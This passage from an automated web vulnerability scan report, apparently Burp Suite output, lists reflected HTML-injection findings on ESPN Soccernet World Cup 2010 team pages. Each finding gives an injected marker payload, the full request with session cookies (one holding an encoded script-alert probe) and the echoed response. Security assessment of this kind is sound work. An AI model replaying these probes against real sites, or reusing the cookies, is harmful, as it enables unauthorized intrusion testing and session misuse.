<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT Content-Length: 82012 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics"> ...[SNIP]...
2.104. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/628/australia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT Content-Length: 82120 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:15 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT Content-Length: 81962 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss"> ...[SNIP]...
2.106. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/656/cameroon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:27 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT Content-Length: 82070 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT Content-Length: 81727 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team"> ...[SNIP]...
2.108. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/657/nigeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT Content-Length: 81827 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT Content-Length: 82134 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1"> ...[SNIP]...
2.110. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/660/united-states
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
